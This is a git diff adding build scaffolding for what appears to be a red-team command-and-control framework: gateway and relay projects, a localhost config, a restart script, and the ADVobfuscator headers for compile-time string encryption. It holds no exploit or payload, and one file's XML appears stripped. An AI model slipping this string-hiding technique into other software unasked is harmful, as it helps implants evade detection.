WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/Res/C3.png b/Res/C3.png new file mode 100644 index 0000000..d571fd7 Binary files /dev/null and b/Res/C3.png differ diff --git a/Res/GatewayConfiguration.json b/Res/GatewayConfiguration.json new file mode 100644 index 0000000..d20c673 --- /dev/null +++ b/Res/GatewayConfiguration.json @@ -0,0 +1,5 @@ +{ + "API Bridge IP": "127.0.0.1", + "API Bridge port": 2323, + "BuildId": "AABBCCDD" +} diff --git a/RestartWebController.cmd b/RestartWebController.cmd new file mode 100644 index 0000000..31ae1f7 --- /dev/null +++ b/RestartWebController.cmd @@ -0,0 +1,9 @@ +@echo off +cd WebController +if exist C3API.db (del C3API.db) +if "%1"=="" ( + set tmp="http://localhost:52935" +) else ( + set tmp=%1 +) +dotnet C3WebController.dll --urls %tmp% diff --git a/Src/C3.sln b/Src/C3.sln new file mode 100644 index 0000000..23e4835 --- /dev/null +++ b/Src/C3.sln @@ -0,0 +1,109 @@ +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.28803.202 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NodeRelayConsoleExe", "NodeRelayConsoleExe\NodeRelayConsoleExe.vcxproj", "{D00C849B-4FA5-4E84-B9EF-B1C8C338647A}" + ProjectSection(ProjectDependencies) = postProject + {9341205B-AEE0-483B-9A80-975C2084C3AE} = {9341205B-AEE0-483B-9A80-975C2084C3AE} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GatewayConsoleExe", "Gateway\Gateway.vcxproj", "{B7C64002-5002-410F-868C-826073AFA924}" + ProjectSection(ProjectDependencies) = postProject + {9341205B-AEE0-483B-9A80-975C2084C3AE} = {9341205B-AEE0-483B-9A80-975C2084C3AE} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NodeRelayDll", "NodeRelayDll\NodeRelayDll.vcxproj", "{946619C2-5959-4C0C-BC7C-1C27D825B042}" + ProjectSection(ProjectDependencies) = postProject + {9341205B-AEE0-483B-9A80-975C2084C3AE} = {9341205B-AEE0-483B-9A80-975C2084C3AE} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Common", "Common\Common.vcxitems", "{5CC52339-4B11-47DF-B1DB-18FBCF057123}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Core", "Core\Core.vcxproj", "{9341205B-AEE0-483B-9A80-975C2084C3AE}" +EndProject +Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "WebController", "WebController\Backend\WebController.csproj", "{023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}" +EndProject +Global + GlobalSection(SharedMSBuildProjectFiles) = preSolution + Common\Common.vcxitems*{5cc52339-4b11-47df-b1db-18fbcf057123}*SharedItemsImports = 9 + Common\Common.vcxitems*{946619c2-5959-4c0c-bc7c-1c27d825b042}*SharedItemsImports = 4 + Common\Common.vcxitems*{b7c64002-5002-410f-868c-826073afa924}*SharedItemsImports = 4 + Common\Common.vcxitems*{d00c849b-4fa5-4e84-b9ef-b1c8c338647a}*SharedItemsImports = 4 + EndGlobalSection + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + ReleaseWithDebInfo|x64 = ReleaseWithDebInfo|x64 + ReleaseWithDebInfo|x86 = ReleaseWithDebInfo|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Debug|x64.ActiveCfg = Debug|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Debug|x64.Build.0 = Debug|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Debug|x86.ActiveCfg = Debug|Win32 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Debug|x86.Build.0 = Debug|Win32 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Release|x64.ActiveCfg = Release|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Release|x64.Build.0 = Release|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Release|x86.ActiveCfg = Release|Win32 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.Release|x86.Build.0 = Release|Win32 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.ReleaseWithDebInfo|x64.ActiveCfg = ReleaseWithDebInfo|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.ReleaseWithDebInfo|x64.Build.0 = ReleaseWithDebInfo|x64 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.ReleaseWithDebInfo|x86.ActiveCfg = ReleaseWithDebInfo|Win32 + {D00C849B-4FA5-4E84-B9EF-B1C8C338647A}.ReleaseWithDebInfo|x86.Build.0 = ReleaseWithDebInfo|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.Debug|x64.ActiveCfg = Debug|x64 + {B7C64002-5002-410F-868C-826073AFA924}.Debug|x64.Build.0 = Debug|x64 + {B7C64002-5002-410F-868C-826073AFA924}.Debug|x86.ActiveCfg = Debug|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.Debug|x86.Build.0 = Debug|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.Release|x64.ActiveCfg = Release|x64 + {B7C64002-5002-410F-868C-826073AFA924}.Release|x64.Build.0 = Release|x64 + {B7C64002-5002-410F-868C-826073AFA924}.Release|x86.ActiveCfg = Release|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.Release|x86.Build.0 = Release|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.ReleaseWithDebInfo|x64.ActiveCfg = ReleaseWithDebInfo|x64 + {B7C64002-5002-410F-868C-826073AFA924}.ReleaseWithDebInfo|x64.Build.0 = ReleaseWithDebInfo|x64 + {B7C64002-5002-410F-868C-826073AFA924}.ReleaseWithDebInfo|x86.ActiveCfg = ReleaseWithDebInfo|Win32 + {B7C64002-5002-410F-868C-826073AFA924}.ReleaseWithDebInfo|x86.Build.0 = ReleaseWithDebInfo|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Debug|x64.ActiveCfg = Debug|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Debug|x64.Build.0 = Debug|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Debug|x86.ActiveCfg = Debug|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Debug|x86.Build.0 = Debug|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Release|x64.ActiveCfg = Release|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Release|x64.Build.0 = Release|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Release|x86.ActiveCfg = Release|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.Release|x86.Build.0 = Release|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.ReleaseWithDebInfo|x64.ActiveCfg = ReleaseWithDebInfo|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.ReleaseWithDebInfo|x64.Build.0 = ReleaseWithDebInfo|x64 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.ReleaseWithDebInfo|x86.ActiveCfg = ReleaseWithDebInfo|Win32 + {946619C2-5959-4C0C-BC7C-1C27D825B042}.ReleaseWithDebInfo|x86.Build.0 = ReleaseWithDebInfo|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Debug|x64.ActiveCfg = Debug|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Debug|x64.Build.0 = Debug|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Debug|x86.ActiveCfg = Debug|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Debug|x86.Build.0 = Debug|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Release|x64.ActiveCfg = Release|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Release|x64.Build.0 = Release|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Release|x86.ActiveCfg = Release|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.Release|x86.Build.0 = Release|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.ReleaseWithDebInfo|x64.ActiveCfg = ReleaseWithDebInfo|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.ReleaseWithDebInfo|x64.Build.0 = ReleaseWithDebInfo|x64 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.ReleaseWithDebInfo|x86.ActiveCfg = ReleaseWithDebInfo|Win32 + {9341205B-AEE0-483B-9A80-975C2084C3AE}.ReleaseWithDebInfo|x86.Build.0 = ReleaseWithDebInfo|Win32 + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Debug|x64.ActiveCfg = Debug|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Debug|x64.Build.0 = Debug|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Debug|x86.ActiveCfg = Debug|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Debug|x86.Build.0 = Debug|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Release|x64.ActiveCfg = Release|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Release|x64.Build.0 = Release|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Release|x86.ActiveCfg = Release|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.Release|x86.Build.0 = Release|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.ReleaseWithDebInfo|x64.ActiveCfg = ReleaseWithDebInfo|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.ReleaseWithDebInfo|x64.Build.0 = ReleaseWithDebInfo|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.ReleaseWithDebInfo|x86.ActiveCfg = ReleaseWithDebInfo|Any CPU + {023B2DB0-6DA4-4F0D-988B-4D9BF522DA37}.ReleaseWithDebInfo|x86.Build.0 = ReleaseWithDebInfo|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {B9B7CEB7-A146-4F29-9A20-085BA7A9E5D7} + EndGlobalSection +EndGlobal diff --git a/Src/Common/ADVobfuscator/Indexes.h b/Src/Common/ADVobfuscator/Indexes.h new file mode 100644 index 0000000..de2567e --- /dev/null +++ b/Src/Common/ADVobfuscator/Indexes.h @@ -0,0 +1,39 @@ +// +// Indexes.h +// ADVobfuscator +// +// Copyright (c) 2010-2017, Sebastien Andrivet +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +// +// 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +// Get latest version on https://github.com/andrivet/ADVobfuscator + +#ifndef Indexes_h +#define Indexes_h + +// std::index_sequence will be available with C++14 (C++1y). For the moment, implement a (very) simplified and partial version. You can find more complete versions on the Internet +// MakeIndex::type generates Indexes<0, 1, 2, 3, ..., N> + +namespace andrivet { namespace ADVobfuscator { + +template +struct Indexes { using type = Indexes; }; + +template +struct Make_Indexes { using type = typename Make_Indexes::type::type; }; + +template<> +struct Make_Indexes<0> { using type = Indexes<>; }; + +}} + +#endif diff --git a/Src/Common/ADVobfuscator/Inline.h b/Src/Common/ADVobfuscator/Inline.h new file mode 100644 index 0000000..af0b025 --- /dev/null +++ b/Src/Common/ADVobfuscator/Inline.h @@ -0,0 +1,29 @@ +// +// Inline.h +// ADVobfuscator +// +// Copyright (c) 2010-2017, Sebastien Andrivet +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +// +// 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +// Get latest version on https://github.com/andrivet/ADVobfuscator + +#ifndef Inline_h +#define Inline_h + +#if defined(_MSC_VER) +#define ALWAYS_INLINE __forceinline +#else +#define ALWAYS_INLINE __attribute__((always_inline)) +#endif + +#endif diff --git a/Src/Common/ADVobfuscator/MetaRandom.h b/Src/Common/ADVobfuscator/MetaRandom.h new file mode 100644 index 0000000..d863a35 --- /dev/null +++ b/Src/Common/ADVobfuscator/MetaRandom.h @@ -0,0 +1,93 @@ +// +// MetaRandom.h +// ADVobfuscator +// +// Copyright (c) 2010-2017, Sebastien Andrivet +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +// +// 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +// Get latest version on https://github.com/andrivet/ADVobfuscator + +#ifndef MetaRandom_h +#define MetaRandom_h + +// Very simple compile-time random numbers generator. + +// For a more complete and sophisticated example, see: +// http://www.researchgate.net/profile/Zalan_Szgyi/publication/259005783_Random_number_generator_for_C_template_metaprograms/file/e0b49529b48272c5a6.pdf + +#include + +namespace andrivet { namespace ADVobfuscator { + +namespace +{ + // I use current (compile time) as a seed + + constexpr char time[] = __TIME__; // __TIME__ has the following format: hh:mm:ss in 24-hour time + + // Convert time string (hh:mm:ss) into a number + constexpr int DigitToInt(char c) { return c - '0'; } + const int seed = DigitToInt(time[7]) + + DigitToInt(time[6]) * 10 + + DigitToInt(time[4]) * 60 + + DigitToInt(time[3]) * 600 + + DigitToInt(time[1]) * 3600 + + DigitToInt(time[0]) * 36000; +} + +// 1988, Stephen Park and Keith Miller +// "Random Number Generators: Good Ones Are Hard To Find", considered as "minimal standard" +// Park-Miller 31 bit pseudo-random number generator, implemented with G. Carta's optimisation: +// with 32-bit math and without division + +template +struct MetaRandomGenerator +{ +private: + static constexpr unsigned a = 16807; // 7^5 + static constexpr unsigned m = 2147483647; // 2^31 - 1 + + static constexpr unsigned s = MetaRandomGenerator::value; + static constexpr unsigned lo = a * (s & 0xFFFF); // Multiply lower 16 bits by 16807 + static constexpr unsigned hi = a * (s >> 16); // Multiply higher 16 bits by 16807 + static constexpr unsigned lo2 = lo + ((hi & 0x7FFF) << 16); // Combine lower 15 bits of hi with lo's upper bits + static constexpr unsigned hi2 = hi >> 15; // Discard lower 15 bits of hi + static constexpr unsigned lo3 = lo2 + hi; + +public: + static constexpr unsigned max = m; + static constexpr unsigned value = lo3 > m ? lo3 - m : lo3; +}; + +template<> +struct MetaRandomGenerator<0> +{ + static constexpr unsigned value = seed; +}; + +// Note: A bias is introduced by the modulo operation. +// However, I do belive it is neglictable in this case (M is far lower than 2^31 - 1) + +template +struct MetaRandom +{ +#ifdef NDEBUG + static constexpr int value = MetaRandomGenerator::value % M; +#else + static constexpr int value = N % M; +#endif // NDEBUG +}; + +}} + +#endif diff --git a/Src/Common/ADVobfuscator/MetaString.h b/Src/Common/ADVobfuscator/MetaString.h new file mode 100644 index 0000000..a8195ce --- /dev/null +++ b/Src/Common/ADVobfuscator/MetaString.h @@ -0,0 +1,266 @@ +// +// MetaString.h +// ADVobfuscator +// +// Copyright (c) 2010-2017, Sebastien Andrivet +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +// +// 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +// Get latest version on https://github.com/andrivet/ADVobfuscator + +#ifndef MetaString_h +#define MetaString_h + +#include "Inline.h" +#include "Indexes.h" +#include "MetaRandom.h" +#include "Common/MWR/SecureString.hpp" + +namespace andrivet::ADVobfuscator +{ + // Helper to generate a key + template + struct MetaRandomChar + { + // Use 0x7F as maximum value since most of the time, char is signed (we have however 1 bit less of randomness) + static const char value = static_cast(1 + MetaRandom::value); + }; + + // Represents an obfuscated string, parametrized with an algorithm number N, a list of indexes Indexes and a key Key + template + struct MetaString; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 0 + // Each character is encrypted (XOR) with the same key + + template + struct MetaString<0, K, Indexes> + { + // Constructor. Evaluated at compile time. + constexpr ALWAYS_INLINE MetaString(const char* str) + : key_{ K }, buffer_{ encrypt(str[I], K)... } { } + + // Runtime decryption. Most of the time, inlined + inline const char* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i]); + buffer_[sizeof...(I)] = 0; + return const_cast(buffer_); + } + + ~MetaString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a character of the original string with the key + constexpr char key() const { return key_; } + constexpr char ALWAYS_INLINE encrypt(char c, int k) const { return c ^ k; } + constexpr char decrypt(char c) const { return encrypt(c, key()); } + + volatile int key_; // key. "volatile" is important to avoid uncontrolled over-optimization by the compiler + volatile char buffer_[sizeof...(I) + 1]; // Buffer to store the encrypted string + terminating null byte + }; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 1 + // Each character is encrypted (XOR) with an incremented key. + + template + struct MetaString<1, K, Indexes> + { + // Constructor. Evaluated at compile time. + constexpr ALWAYS_INLINE MetaString(const char* str) + : key_(K), buffer_{ encrypt(str[I], I)... } { } + + // Runtime decryption. Most of the time, inlined + inline const char* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i], i); + buffer_[sizeof...(I)] = 0; + return const_cast(buffer_); + } + + ~MetaString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a character of the original string with the key + constexpr char key(size_t position) const { return static_cast(key_ + position); } + constexpr char ALWAYS_INLINE encrypt(char c, size_t position) const { return c ^ key(position); } + constexpr char decrypt(char c, size_t position) const { return encrypt(c, position); } + + volatile int key_; // key. "volatile" is important to avoid uncontrolled over-optimization by the compiler + volatile char buffer_[sizeof...(I) + 1]; // Buffer to store the encrypted string + terminating null byte + }; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 2 + // Shift the value of each character and does not store the key. It is only used at compile-time. + + template + struct MetaString<2, K, Indexes> + { + // Constructor. Evaluated at compile time. Key is *not* stored + constexpr ALWAYS_INLINE MetaString(const char* str) + : buffer_{ encrypt(str[I])..., 0 } { } + + // Runtime decryption. Most of the time, inlined + inline const char* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i]); + return const_cast(buffer_); + } + + ~MetaString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a character of the original string with the key + // Be sure that the encryption key is never 0. + constexpr char key(char key) const { return 1 + (key % 13); } + constexpr char ALWAYS_INLINE encrypt(char c) const { return c + key(K); } + constexpr char decrypt(char c) const { return c - key(K); } + + // Buffer to store the encrypted string + terminating null byte. Key is not stored + volatile char buffer_[sizeof...(I) + 1]; + }; + + //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + //Wchar + // Represents an obfuscated string, parametrized with an algorithm number N, a list of indexes Indexes and a key Key + template + struct MetaWString; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 0 + // Each wchar_tacter is encrypted (XOR) with the same key + + template + struct MetaWString<0, K, Indexes> + { + // Constructor. Evaluated at compile time. + constexpr ALWAYS_INLINE MetaWString(const wchar_t* str) + : key_{ K }, buffer_{ encrypt(str[I], K)... } { } + + // Runtime decryption. Most of the time, inlined + inline const wchar_t* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i]); + buffer_[sizeof...(I)] = 0; + return const_cast(buffer_); + } + + ~MetaWString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a wchar_tacter of the original string with the key + constexpr wchar_t key() const { return key_; } + constexpr wchar_t ALWAYS_INLINE encrypt(wchar_t c, int k) const { return c ^ k; } + constexpr wchar_t decrypt(wchar_t c) const { return encrypt(c, key()); } + + volatile int key_; // key. "volatile" is important to avoid uncontrolled over-optimization by the compiler + volatile wchar_t buffer_[sizeof...(I) + 1]; // Buffer to store the encrypted string + terminating null byte + }; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 1 + // Each wchar_tacter is encrypted (XOR) with an incremented key. + + template + struct MetaWString<1, K, Indexes> + { + // Constructor. Evaluated at compile time. + constexpr ALWAYS_INLINE MetaWString(const wchar_t* str) + : key_(K), buffer_{ encrypt(str[I], I)... } { } + + // Runtime decryption. Most of the time, inlined + inline const wchar_t* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i], i); + buffer_[sizeof...(I)] = 0; + return const_cast(buffer_); + } + + ~MetaWString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a wchar_tacter of the original string with the key + constexpr wchar_t key(size_t position) const { return static_cast(key_ + position); } + constexpr wchar_t ALWAYS_INLINE encrypt(wchar_t c, size_t position) const { return c ^ key(position); } + constexpr wchar_t decrypt(wchar_t c, size_t position) const { return encrypt(c, position); } + + volatile int key_; // key. "volatile" is important to avoid uncontrolled over-optimization by the compiler + volatile wchar_t buffer_[sizeof...(I) + 1]; // Buffer to store the encrypted string + terminating null byte + }; + + // Partial specialization with a list of indexes I, a key K and algorithm N = 2 + // Shift the value of each wchar_tacter and does not store the key. It is only used at compile-time. + + template + struct MetaWString<2, K, Indexes> + { + // Constructor. Evaluated at compile time. Key is *not* stored + constexpr ALWAYS_INLINE MetaWString(const wchar_t* str) + : buffer_{ encrypt(str[I])..., 0 } { } + + // Runtime decryption. Most of the time, inlined + inline const wchar_t* decrypt() + { + for (size_t i = 0; i < sizeof...(I); ++i) + buffer_[i] = decrypt(buffer_[i]); + return const_cast(buffer_); + } + + ~MetaWString() + { + SecureZeroMemory((void*)buffer_, sizeof(buffer_)); + } + + private: + // Encrypt / decrypt a wchar_tacter of the original string with the key + // Be sure that the encryption key is never 0. + constexpr wchar_t key(wchar_t key) const { return 1 + (key % 13); } + constexpr wchar_t ALWAYS_INLINE encrypt(wchar_t c) const { return c + key(K); } + constexpr wchar_t decrypt(wchar_t c) const { return c - key(K); } + + // Buffer to store the encrypted string + terminating null byte. Key is not stored + volatile wchar_t buffer_[sizeof...(I) + 1]; + }; +} + +// Prefix notation +#define DEF_OBFUSCATED(str) andrivet::ADVobfuscator::MetaString::value, andrivet::ADVobfuscator::MetaRandomChar::value, andrivet::ADVobfuscator::Make_Indexes::type>(str) +#define DEF_OBFUSCATED_W(str) andrivet::ADVobfuscator::MetaWString::value, andrivet::ADVobfuscator::MetaRandomChar::value, andrivet::ADVobfuscator::Make_Indexes::type>(str) + +#define OBF(str) (DEF_OBFUSCATED(str).decrypt()) +#define OBF_W(str) (DEF_OBFUSCATED_W(str).decrypt()) + +#define OBF_STR(str) (std::string{DEF_OBFUSCATED(str).decrypt()}) +#define OBF_WSTR(str) (std::wstring{DEF_OBFUSCATED_W(str).decrypt()}) + +#define OBF_SEC(str) (MWR::SecureString{DEF_OBFUSCATED(str).decrypt()}) +#define OBF_WSEC(str) (MWR::SecureWString{DEF_OBFUSCATED_W(str).decrypt()}) + +#endif diff --git a/Src/Common/C3_BUILD_VERSION_HASH_PART.hxx b/Src/Common/C3_BUILD_VERSION_HASH_PART.hxx new file mode 100644 index 0000000..9b6df99 --- /dev/null +++ b/Src/Common/C3_BUILD_VERSION_HASH_PART.hxx @@ -0,0 +1,2 @@ +#include "StdAfx.h" +#define C3_BUILD_VERSION "C3-1.0.manual-build" diff --git a/Src/Common/Common.vcxitems b/Src/Common/Common.vcxitems new file mode 100644 index 0000000..5eb8011 --- /dev/null +++ b/Src/Common/Common.vcxitems @@ -0,0 +1,103 @@ + + + + $(MSBuildAllProjects);$(MSBuildThisFileFullPath) + true + {5cc52339-4b11-47df-b1db-18fbcf057123} + + + + %(AdditionalIncludeDirectories);$(MSBuildThisFileDirectory) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Src/Common/Common.vcxitems.filters 